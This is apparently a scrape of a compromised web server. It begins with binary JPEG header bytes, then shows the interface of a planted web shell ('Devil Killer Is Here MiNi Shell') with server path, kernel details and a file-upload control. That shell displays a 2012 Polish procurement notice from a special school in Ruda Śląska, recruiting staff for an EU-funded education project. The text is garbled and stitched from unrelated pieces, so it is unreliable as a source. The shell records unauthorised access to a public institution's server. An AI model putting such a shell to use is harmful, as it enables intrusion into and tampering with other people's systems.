JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120217/47840-N-2012.html

<p class="kh_header"><b>Ruda Śląska: Wyłonienie kandydata do świadczenia usług 1. Zarządzającego projektem, 2. Koordynatora ds. organizacyjno-ewaluacyjnych, 3. Koordynatora ds. finansowych, 4. Głównego księgowego 5. Pomocy biurowej, w ramach Projektu Nauczanie przez doświadczanie, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie  do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.</b><br>
<b>Numer ogłoszenia: 47840 - 2012; data zamieszczenia: 17.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Specjalnych Nr 3 im. św. Łukasza w Rudzie Śląskiej , ul. Sygietyńskiego 6, 41-710 Ruda Śląska, woj. śląskie, tel. 32 3400010, faks 32 3400010.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.lukaszki.mssm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyłonienie kandydata do świadczenia usług 1. Zarządzającego projektem, 2. Koordynatora ds. organizacyjno-ewaluacyjnych, 3. Koordynatora ds. finansowych, 4. Głównego księgowego 5. Pomocy biurowej, w ramach Projektu Nauczanie przez doświadczanie, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie  do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wyłonienie kandydata do świadczenia usługi : CZĘŚĆ1  
Zarządzającego projektem w ramach  Projektu Nauczanie przez doświadczanie, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie  do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
Do obowiązków Zarządzającego Projektem, będzie należało:
1)Nadzorowanie działań projektowych od momentu rozpoczęcia realizacji projektu do czasu ostatecznego rozliczenia projektu przez Instytucję Pośredniczącą. 
2)Nadzór nad dysponowaniem środkami przeznaczonymi na realizację zadania zgodnie z procedurą dokonywania zakupów oraz udzielania zamówień o wartości nie przekraczającej wyrażonej w złotych równowartości kwoty 14000 EURO netto W ZSS NR 3 w Rudzie Śląskiej i Prawem Zamówień Publicznych.
3)Zabezpieczenie właściwej kadry i obsługi administracyjnej i zaplecza technicznego
4)Nawiązywanie i utrzymywanie kontaktu z instytucjami.
5)Nadzór nad terminowym i właściwym zrealizowaniem całości projektu.
6)Współpraca z pracownikami zespołu projektowego.
7)Nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem.
8)Nadzorowanie bieżących postępów w realizacji projektu.
9)Koordynacja prac zespołu projektowego i podejmowanie decyzji.
10)Koordynacja działań merytorycznych i logistycznych związanych z projektem.
11)Utrzymywanie stałych kontaktów z opiekunem projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów.   
12)Nadzór nad  korespondencją związaną z projektem do Instytucji Pośredniczącej.
13)Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu.
14)Kontrola wydatkowania środków.
15)Dokonywanie innych czynności zastrzeżonych dla kompetencji Zarządzającego.
16)przygotowanie raportów pokontrolnych oraz zaleceń i rekomendacji mających na celu właściwą realizację merytoryczną Projektu;
CZĘŚĆ2
Koordynatora ds. organizacyjno-ewaluacyjnych w ramach  Projektu Nauczanie przez doświadczanie, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie  do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
Do obowiązków Koordynatora ds. organizacyjno- ewaluacyjnych Projektu, będzie należało:
1)przygotowywanie i koordynacje korespondencji związanej z projektem do Instytucji Pośredniczącej (np. aktualizacja wniosków, formularzy zmian, inne w miarę potrzeb).
2)prowadzenie Biura Projektu.
3)planowanie działań i wywiązywania się ze wskaźników.
4)kierowanie bieżącymi sprawami związanymi z realizacją projektu.
5)koordynowanie działań projektowych.
6)przedstawianie Zarządzającemu na bieżąco sprawozdań o stanie realizacji zadań i o wynikłych nieprawidłowościach.
7)kierowanie wykonaniem projektu w formie nadzoru merytorycznego i technicznego od momentu rozpoczęcia realizacji projektu do czasu ostatecznego rozliczenia projektu przez Instytucję Pośredniczącą. 
8)współpraca ze koordynatorem ds. obsługi finansowej, w zakresie realizowanych zadań i osiąganych wskaźników.
9)współpraca z Koordynatorem ds. obsługi finansowej w zakresie przygotowania części merytorycznej sprawozdań oraz wniosków o płatność.
10)współpraca z Koordynatorem ds. promocji w zakresie wewnętrznej i zewnętrznej komunikacji realizacji zadań projektowych.
11)przygotowanie planu oraz metod i narzędzi monitorowania realizacji Projektu.
12)przygotowanie, rozprowadzenie i zbieranie kwestionariuszy monitorujących oraz opracowywanie i przedstawianie wyników Zarządzającemu wraz z rekomendacjami zmian.
13)katalogowanie i archiwizowanie dokumentów związanych z bieżącym monitorowaniem oraz ewaluacją Projektu.
14)prowadzenie monitoringu i ewaluacji projektu.
15)rekrutacji uczestników projektu.
16)monitorowanie Beneficjentów Ostatecznych, w tym: kontrola oświadczeń beneficjentów w zakresie zgodności z Projektem oraz wytycznymi PO KL oraz weryfikacja danych dotyczących beneficjentów z PEFS, zał. Nr 2, inne;
17)Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu.
18)Nadzór nad dokumentacją projektu (w tym: dokumentacja zajęć, karty czasu pracy, narzędzia diagnozujące, harmonogramy zajęć, dzienniki, dokumentacja sprawozdawcza, inne).
19)Dokonywanie innych czynności zastrzeżonych dla kompetencji Koordynatora.
CZĘŚĆ 3
Koordynatora ds. finansowych w ramach  Projektu Nauczanie przez doświadczanie, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie  do eukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
Do obowiązków Koordynatora ds.  finansowych Projektu, będzie należało:
1)Realizacja zadań dotyczących finansów projektu, w odniesieniu do poszczególnych zadań objętych projektem, a także okresowe dokonywanie przeglądów realizacji projektu od momentu rozpoczęcia realizacji projektu do czasu ostatecznego rozliczenia projektu przez Instytucję Pośredniczącą.
2)Współpraca w zakresie księgowania i realizacji płatności projektu z księgowym Projektu.
3)Współpraca w zakresie księgowości z Instytucją Pośredniczącą.
4)Odpowiednie opisywanie dokumentów związanych z realizacją projektu, zgodnie z wytycznymi.
5)Ocena dokumentów projektu pod kątem spełnienia kryteriów dla tzw. wydatków kwalifikowanych.          
6)Sporządzanie zestawień dokumentów rozliczeniowych przedstawiających wykorzystanie środków realizowanego projektu - wniosek o płatność.
7)Zapobieganie powstawaniu nieprawidłowości finansowych i raportowanie ich wystąpienia.
8)Nadzór nad płatnościami dla wykonawców.
9)Przestrzeganie procedur i instrukcji związanych z realizacją projektu.
10)Współpraca z  Zarządzającym i Księgowym projektu w celu zapewnienia prawidłowego przepływu informacji.
11)Współpraca z organami kontrolującymi.
12)Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu.
13)Dokonywanie innych czynności zastrzeżonych dla kompetencji Koordynatora.
CZĘŚĆ 4
Głównego księgowego w ramach  Projektu Nauczanie przez doświadczanie, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie  do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
Do obowiązków Głównego księgowego, będzie należało:
1)Odpowiedzialność za całokształt spraw związanych z gospodarką finansową projektu od momentu rozpoczęcia realizacji projektu do czasu ostatecznego rozliczenia projektu przez Instytucję Pośredniczącą.
2)Kierowanie i organizacja pracy w zakresie zadań księgowych obejmujących całokształt projektu (planowanie, budżet, sprawozdawczość).
3)Przygotowanie harmonogramu dysponowania środkami finansowymi.
4)Rzetelne i terminowe przygotowanie niezbędnych dokumentów dotyczących księgowania.
5)Nadzór nad rozliczeniami finansowymi.
6)Realizacja niezbędnych czynności związanych z kryteriami prowadzenia księgowości w ramach PO KL (np. czynności związane z obsługą wyodrębnionego konta, sporządzanie wypłat, przelewów, not księgowych, sprawozdań, rozliczeń, odprowadzanie składek na ubezpieczenie społeczne, fundusz pracy, zaliczki na podatek dochodowy, sporządzanie list płac do wypłat i ich realizacja).
7)Przygotowanie rozliczeń i sprawozdań zgodnie z wymogami realizacji programu.
8)Przygotowanie raportów o finansowym postępie w realizacji projektu.
9)Zapobieganie powstawaniu nieprawidłowości finansowych i raportowanie ich wystąpienia.
10)Czuwanie nad zgodnością wydatków z budżetem w podziale na paragrafy.
11)Monitorowanie  prawidłowości rozliczeń finansowych zgodnych z budżetem.
12)Bieżący kontakt z  Instytucją Pośredniczącą w zakresie sprawozdawczości finansowej.
13)Współpraca z zespołem zarządzającym.
14)Przygotowanie niezbędnej dokumentacji potrzebnej do otrzymania kolejnych transz dofinansowania.
15)Odpowiednie opisywanie dokumentów związanych z realizacją projektu, zgodnie z wytycznymi.
16)Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu.
17)Dysponowanie środkami przeznaczonymi na realizację zadania zgodnie z procedurą dokonywania zakupów oraz udzielania zamówień o wartości nie przekraczającej wyrażonej w złotych równowartości kwoty 14000 EURO netto W ZSS NR 3 w Rudzie Śląskiej i Prawem Zamówień Publicznych.
18)Przygotowanie projektów planów budżetowych oraz w razie potrzeby wszelkich zmian w planach wydatków budżetowych w porozumieniu z wydziałami Urzędu Miasta Ruda Śląska . 
19)Dokonywanie innych czynności zastrzeżonych dla kompetencji Głównego księgowego.
CZĘŚĆ 5
Pomocy biurowej w ramach  Projektu Nauczanie przez doświadczanie, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie  do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
Do obowiązków Pomocy biurowej, będzie należało:
1)Wspieranie działań zespołu zarządzającego w procesie organizacyjno-sprawozdawczym.
2)Przygotowanie dokumentacji związanej z monitoringiem korespondencji i sprawozdawczości.
3)Przygotowanie umów dla osób zatrudnionych w projekcie.
4)Przygotowanie projektów planów budżetowych oraz w razie potrzeby wszelkich zmian w planach wydatków budżetowych w porozumieniu z księgową.
5)Przygotowanie rachunków wystawionych przez zleceniobiorców do wypłaty, sprawdzenie ich poprawności pod względem formalnym i rachunkowym.
6)Nadzór i opisywanie  dokumentacji projektu.
7)Przygotowanie dokumentów do rozliczania czasu pracy osób zatrudnionych w programie.
8)Przygotowanie i opisanie faktur i rachunków , przedkładanie ich u księgowej.
9)Prowadzenie rejestru wydatków.
10)Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu.
11)Współpraca z zespołem zarządzającym.
12)Ewidencjonowanie zakupionych przedmiotów.
13)Dokonywanie innych czynności zastrzeżonych dla kompetencji Pomocy biurowej.

Wykonywanie zleconych zadań odbywać się będzie w siedzibie Zamawiającego przez czas trwania umowy, tj. od momentu rozpoczęcia realizacji projektu do czasu ostatecznego rozliczenia projektu przez Instytucję Pośredniczącą w wyznaczone dni, w szczególności w dniach realizacji zadań projektowych (działalność Biura oraz dni zajęć warsztatowych-także w soboty). W przypadku kolizji świadczeń, świadczenie na rzecz Zamawiającego posiada pierwszeństwo przed świadczeniami na rzecz osób trzecich. Wykonawcy przyjmujący obowiązki związane z prowadzeniem Projektu będą zatrudnieni przez Zamawiającego na podstawie umowy zlecenia. Wykonawców obowiązuje należyta staranność w wykonywaniu przedmiotu zamówienia.Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawców podczas wykonywania przedmiotu zamówienia.   
Dane dotyczące projektu Nauczanie przez doświadczanie współfinansowanego ze środków   Europejskiego Funduszu Społecznego i Budżetu Państwa w ramach programu POKL działanie 9.1.2  - Biuro Projektu:  Zespół Szkół Specjalnych Nr 3 im. Św. Łukasza, ul. Sygietyńskiego 6, 41-710 Ruda Śląska, woj. Śląskie:
Termin realizacji projektu: od 1.03.2012 roku do 28.02.2013 roku,
Wartość projektu - 472113 zł
Liczba beneficjentów objętych projektem - 64 osoby.
Rodzaje wsparcia dla beneficjentów:
1) Wsparcie psychologiczno-pedagogiczne;
2) Doradztwo edukacyjno-zawodowe;
3) Specjalistyczne warsztaty z elementami metody Decrolyego  i SI;
4) Warsztaty kompetencji kluczowych.
Czas pracy:
Zarządzającego projektem-400 godzin;
Koordynatora ds. organizacyjno-ewaluacyjnych-540 godzin 
Koordynatora ds. finansowych-540 godzin podziałem na 2 stanowiska;
Księgowej- 800 godzin;
Pomocy biurowej- 800 godzin.
W przypadku konieczności weryfikacji ilości przepracowanych godzin decyzją osoby zarządzającej przewiduje się możliwość zmniejszenia ilości godzin do25 %.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.42.11.00-0, 79.21.11.00-2, 75.11.21.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, którzy spełniają określone przez Zamawiającego warunki tj.: posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
a) wykształcenie wyższe z przygotowaniem pedagogicznym oraz kwalifikacjami z zakresu oligofrenopedagogiki - CZĘŚĆ 1, 2, 3,  
b) wykształcenie wyższe zawodowe  lub średnie  z  odpowiednim doświadczeniem w zakresie zajmowanego stanowiska- CZĘŚĆ 5; 
c)spełnienie jednego z poniższych warunków:
- ukończenie ekonomicznych jednolitych studiów magisterskich, ekonomicznych wyższych studiów zawodowych, uzupełniających ekonomicznych studiów magisterskich, ekonomicznych studiów podyplomowych, posiadanie co najmniej 3-letnią praktykę w księgowości, lub:
- ukończenie średniej, policealnej lub pomaturalnej szkoły ekonomicznej i posiadanie co najmniej 6-letniej praktyki w księgowości, lub:
- jest wpisana do rejestru biegłych rewidentów na podstawie odrębnych przepisów, posiada świadectwo kwalifikacyjne uprawniające do usługowego prowadzenia ksiąg rachunkowych lub certyfikat księgowy, wydane na podstawie odrębnych przepisów: CZĘŚĆ 4
d) doświadczenie we wdrażaniu minimum dwóch  projektu finansowanych  ze środków Unii Europejskiej (Europejskiego Funduszu Społecznego) CZĘŚĆ 1, 2,3
e) doświadczenie zawodowe w pracy w administracji publicznej lub sektora pozarządowego (np. stowarzyszenia, fundacje)na stanowisku kierowniczym  (min. 5 lat),  CZĘŚĆ 1;
f) znajomość zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej, CZĘŚĆ 1,2,3,4,5.
g) znajomość przepisów ustawy Prawo zamówień publicznych, ustawy o finansach publicznych oraz ustawy Karta Nauczyciela,  CZĘŚĆ 1.2.3.4.5.
h) umiejętność obsługi komputera (w tym obsługi pakietu MS Office, Internetu, generatora wniosków aplikacyjnych PO KL i generatora wniosków o płatność). CZĘŚĆ 1,2,3,4;
i) posiadanie zdolności organizacyjnych,  CZĘŚĆ 1,2,3,4,5;
j) posiadanie pełnej zdolności do czynności prawnych oraz korzystanie z pełni praw publicznych, CZĘŚĆ 1,2,3,4,5.
k) nie była karana za przestępstwo popełnione umyślnie lub przestępstwo skarbowe CZĘŚĆ 1,2,3,4,5.
Ocena spełnienia warunków dokonana zostanie zgodnie z formułą: spełnia - nie spełnia
w oparciu o informacje zawarte w dokumentach i oświadczeniach wymienionych 
w pkt. 9 specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ 1
1. W celu potwierdzenia spełniania warunków stawianych wykonawcom przez zamawiającego oraz dla uznania formalnej poprawności oferta musi zawierać następujące dokumenty i oświadczenia: 
a. Formularz oferty - wypełniony i podpisany przez Wykonawcę - Załącznik nr 1 do SIWZ,
b. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy Prawo zamówień publicznych - Załącznik nr 2 do SIWZ,
c. Kwestionariusz osobowy wraz z oświadczeniem - Załącznik nr 3 do SIWZ,
d. Zaświadczenie lub inny dokument potwierdzający doświadczenie we wdrażaniu minimum dwóch  projektów finansowanych ze środków Unii Europejskiej (Europejskiego Funduszu Społecznego)
f. Zgoda na przetwarzanie danych osobowych dla potrzeb realizacji procesu rekrutacji zgodnie 
z ustawą o ochronie danych osobowych oraz ustawą o pracownikach samorządowych.
g. Oświadczenie o posiadaniu zdolności organizacyjnych oraz o znajomości obsługi pakietu MS Office, Internetu, generatora wniosków aplikacyjnych PO KL i generatora wniosków o płatność.
h. Oświadczenie o niekaralności za przestępstwo popełnione umyślnie lub przestępstwo skarbowe oraz o posiadaniu pełnej zdolności do czynności prawnych oraz korzystaniu z pełni praw publicznych.
i. Oświadczenie o doświadczeniu zawodowym pracy w administracji publicznej lub pozarządowej na stanowisku kierowniczym  Załącznik nr 4 do SIWZ,
j. Oświadczenie o znajomości zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej.
k. Oświadczenie o znajomości przepisów ustawy prawo zamówień publicznych, ustawy o finansach publicznych oraz ustawy Karta Nauczyciela.
UWAGA! 
Brak jakiegokolwiek z wyżej wymienionych dokumentów żądanych przez zamawiającego, spowoduje wykluczenie wykonawcy z postępowania z mocy art. 24 ust. 2 pkt 3 - dokumenty niespełniające wymogów, co do formy traktuje się jako niezłożenie wymaganych dokumentów z zastrzeżeniem art. 26 ust. 3
CZĘŚĆ 2
W celu potwierdzenia spełniania warunków stawianych wykonawcom przez zamawiającego oraz dla uznania formalnej poprawności oferta musi zawierać następujące dokumenty i oświadczenia: 
a. Formularz oferty - wypełniony i podpisany przez Wykonawcę - Załącznik nr 1 do SIWZ,
b. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy Prawo zamówień publicznych - Załącznik nr 2 do SIWZ,
c. Kwestionariusz osobowy wraz z oświadczeniem - Załącznik nr 3 do SIWZ,
d. Zaświadczenie lub inny dokument potwierdzający doświadczenie wdrażania minimum dwóch projektów  finansowanych  ze środków Unii Europejskiej (Europejskiego Funduszu Społecznego)
e. Zgoda na przetwarzanie danych osobowych dla potrzeb realizacji procesu rekrutacji zgodnie 
z ustawą o ochronie danych osobowych oraz ustawą o pracownikach samorządowych.
f. Oświadczenie o posiadaniu zdolności organizacyjnych oraz o znajomości obsługi pakietu MS Office, Internetu, generatora wniosków aplikacyjnych PO KL i generatora wniosków o płatność.
g. Oświadczenie o niekaralności za przestępstwo popełnione umyślnie lub przestępstwo skarbowe oraz o posiadaniu pełnej zdolności do czynności prawnych oraz korzystaniu z pełni praw publicznych.
i. Oświadczenie o znajomości zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej.
j. Oświadczenie o znajomości przepisów ustawy prawo zamówień publicznych, ustawy o finansach publicznych oraz ustawy Karta Nauczyciela.
UWAGA! 
Brak jakiegokolwiek z wyżej wymienionych dokumentów żądanych przez zamawiającego, spowoduje wykluczenie wykonawcy z postępowania z mocy art. 24 ust. 2 pkt 3 - dokumenty niespełniające wymogów, co do formy traktuje się jako niezłożenie wymaganych dokumentów z zastrzeżeniem art. 26 ust. 3

CZĘŚĆ 3
1. W celu potwierdzenia spełniania warunków stawianych wykonawcom przez zamawiającego oraz dla uznania formalnej poprawności oferta musi zawierać następujące dokumenty i oświadczenia: 
a. Formularz oferty - wypełniony i podpisany przez Wykonawcę - Załącznik nr 1 do SIWZ,
b. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy Prawo zamówień publicznych - Załącznik nr 2 do SIWZ,
c. Kwestionariusz osobowy wraz z oświadczeniem - Załącznik nr 3 do SIWZ,
d. Zaświadczenie lub inny dokument potwierdzający doświadczenie we wdrażaniu minimum dwóch  projektów finansowanych  ze środków Unii Europejskiej (Europejskiego Funduszu Społecznego)
e. Zgoda na przetwarzanie danych osobowych dla potrzeb realizacji procesu rekrutacji zgodnie 
z ustawą o ochronie danych osobowych oraz ustawą o pracownikach samorządowych.
f. Oświadczenie o posiadaniu zdolności organizacyjnych oraz o znajomości obsługi pakietu MS Office, Internetu, generatora wniosków aplikacyjnych PO KL i generatora wniosków o płatność.
g. Oświadczenie o niekaralności za przestępstwo popełnione umyślnie lub przestępstwo skarbowe oraz o posiadaniu pełnej zdolności do czynności prawnych oraz korzystaniu z pełni praw publicznych.
i. Oświadczenie o znajomości zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej.
j. Oświadczenie o znajomości przepisów ustawy prawo zamówień publicznych, ustawy o finansach publicznych oraz ustawy Karta Nauczyciela.
UWAGA! 
